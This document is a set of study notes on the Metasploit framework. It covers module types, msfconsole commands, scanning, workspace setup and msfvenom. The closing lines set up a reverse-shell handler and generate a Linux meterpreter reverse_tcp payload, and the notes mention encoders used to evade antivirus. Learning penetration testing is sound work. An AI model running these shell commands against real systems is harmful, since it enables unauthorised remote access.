Metasploit

Introduction

Main Components

msfconsole

• auxiliary
  • supporting modules
  • scanners, crawlers, fuzzers
• encoders
  • encode exploit and payload to circumvent signature based antivirus
• evasion
  • evade antivirus software
• exploits
  • exploits organized by system
• NOPs
  • No OPeration
  • do nothing for one cycle for Intel x86 CPUs
  • often used as buffer to achieve consistent payload sizes
• payloads
  • code that will run on target system
  • categorized as
    • adapters: wrap single payloads to convert them into different formats
      • e.g. normal single payload wrapped inside powershell adapter, will make a single powershell command that will execute the payload
    • singles: self contained payloads, that do not need to download an additional component
      • e.g. add user, launch notepad.exe …
    • stagers: for setting up connection channels between metasploit and target system
    • stages: downloaded by stager
• Post
  • useful during final stage of penetration test

msfconsole

to show specific modules belonging to an exploit

exploit ... > show <paylaods auxiliary exploit ... >

information about a module

exploit ... > info

to search for specifc exploits etc.

search <search paramaters>

Exploits ranks, by reliability

Working with Modules

use module as context

use <path to module>

show parameters that need to be set using (in module context)

module ... > show options

set parameters using

set <parameter name> <value>

setting parameters for all modules

setg <parameter name> <value>

leave module context

back

running an exploit in exploit context

exploit

run exploit and background session when it opens

exploit -z

check if target is exploitable without exploiting it

check

Exploitation

Port scanning

list modules for scanning ports

search portscan

• will require following parameters to be set
  • concurrency: numbers of targets to be scanned simultaneously
  • ports: port range to be scanned
  • rhosts: target or network to be scanned
  • threads: number of threads that will be used simultaneously, more=faster

UDP service identification

• scanner/discovery/udp_sweep
  • quickly identify services running over UDP
  • not an extensive scan, but quick way to identify services such as DNS or NetBIOS

SMB Scans

• has several auxiliary modules to scan for speficic services

Metasploit database

have to start postgresql database for metasploit to use

systemctl start postgresql
msfdb init

allows you to manage workspaces to isolate into different projects

msf6 > workspace # list available workspaces
msf6 > workspace -a <name> # add new workspace
msf6 > workspace -d <name> # delete a workspace
msf6 > workspace <name> # to switch to a workspace

using db enables different commands, e.g. db_nmap

help # to list commands

Exploitation

choose a exploit

use <path to exploit>

then choose payload depending on exploit, while in exploit context

show paylaods
# to set payload use
set payload <number>

Msfvenom

• allows to generate payloads
• encoders
  • encode payload into different formats
• handlers
  • able to handle incoming connections generated by msfvenom payloads
  • automatically handled by exploit module
  • multihandler supports all metasploit payloads, can be used for meterpreter as well as regular shells

example:

use exploit/multi/handler
set payload php/reverse_php
set LHOST ...
set LPORT ...
run

create meterpreter payload for reverse shell example

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf